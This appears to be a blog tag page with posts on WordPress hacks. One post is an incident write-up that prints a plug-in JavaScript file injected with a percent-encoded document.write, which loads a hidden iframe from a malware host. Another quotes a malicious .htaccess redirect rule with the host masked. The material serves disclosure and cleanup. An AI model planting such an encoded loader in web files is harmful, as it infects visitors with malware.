Technical Tidbits™

Posts Tagged ‘wp’

In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow-up with more details as they became available to me.

First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.

I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and what was accessed during the time of the hack.

During my investigation, another interesting development that I was just told about, and that is another user of the web hosting service was also hacked in a similar method.

So now, I was looking into a server vulnerability. I know I run the risk of a smart hacker figuring out the web host and attempting a future hack on other sites but, that leads us to the issue of the web hosting company making sure they are protecting their users!

I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users.  So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)

That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!

I poured over the SQL database dump for over 48 hours (not consecutively) and compared WP files like the WP_config.php and such and could not find anything except a strange base64-65 code that I could not isolate.

I searched online for other answers and read reports of hack after hack as to how they were being done and still could not find it.

I looked at individual plug-in file JPG files and upload JPG files to see if they were actually pictures or a spoofed file name containing actual code. Still nothing.

After more than 48 hours of research and Sam’s help with doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!

Now, I’m going to share this with you. This hack was a Cross-site Scripting (XSS) hack.

The code resided in a plug-in called, I Love Social Bookmarking and the file affected resided in:  wp-content/plugins/i-love-social-bookmarking/includes/

The actual file was named: ilsb.js

The normal ilsb.js file should read:

// JavaScript Document
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The hacked code within Sam’s file read:

// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The offending code is the one that writes the document and includes all the percent signs (%).

This code inserted an iframe in the top of the page which redirected to a malware site.

Because of this, Sam was starting to get blacklisted on Google and Bing and her site was beginning to be blocked by software that uses Google malware detection and that included Firefox!

I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.

But here is your take-away from this experience: secure you WP blog!

1. Remove the Admin account by logging in and setting up a new administrator account with a totally different name.  Assign it the administrator priviladges.
2. Log out and log back in under the new name.
3. Delete the admin account and WordPress will ask you if you’d like to assign the posts to another user. Assign them to your new user name.
4. Install the Bad Behavior Plug-in and configure it properly.

If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!

5. Make sure you config and get the API key for Akismet.
6. Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet and suffice it to say that I believe spam comments with links may be key in this method.
7. Make sure that all users – if you allow them to register – are configured to be subscribers only!
8. If you suspect foul play of any sort, search for a hidden user. To do that:

• Click on your Users section.
• Click on the link to the Administrators page.
• Right click on the page and choose: View Source.
• Look for the following code on that source page:  tbody id="users".  It should be toward the bottom. If you have 1 registered administrator, there should only be one name in that list. If you have 2, then there should only be two names, and so on.
• If you find one, you will have to delete this person out of your SQL database.

I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!

TECHS: Please read: NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow Vulnerability Note, located here:  https://www.kb.cert.org/vuls/id/773545

And, Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/508357

*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!

Here at MICE, we don’t publicly advertise our security clients because it’s an open invitation to hackers.

However, I do need to tell you that I was recently hired to look over a self-hosted WordPress blog site that had been hacked.  I didn’t get to see the actual hacked message, but the client described it as a defacement of the main blog page saying, “You’ve been hacked.”

I am still trying to find out from the blog owner a few minor details to determine how it was actually done, but the .htaccess file had been modified giving the hacker permission to rewrite to all the files on the blog.

As soon as I find out the remaining information, I will post more details including screen shots of the website that the file redirected to.

I am blocking the actual redirect website with Xs in the line I found in question in the .htaccess file because I don’t want anyone going there, but if you see this code, delete it and re-upload the file.

RewriteRule .* http://xxx-xxxxx.xx/xx.cgi?4&parameter=ku [R,L]

The R stands for Redirect and the L means Last so it stops processing the rule after the condition is matched.

You can open the .htaccess file in a textpad or notepad document if you right mouse click and choose open with.

More later but this your heads up!

WordPress updated it’s package quite a few days ago,  and if you haven’t installed the update yet, you should!The WordPress hackers are on the prowl again!

If you’ve been following our blog tracking the WordPress suspicious subscribers starting with, An Open Note to WordPress Spammers & Hackers, and then, Adding to the WP Hacking Post, you’ll know many people are listing suspicious subscription activity to their WordPress blogs.

Update on suspicious WordPress Subscribers today:

Username: fil452
E-mail: fil452@o2.pl

Username: lif245
E-mail: lif245@o2.pl

Username: adminst
E-mail: makilovitalcamader@gmail.com

Anyone else have anything to report?

It’s amazing how these suddenly start appearing directly before an update, or directly after!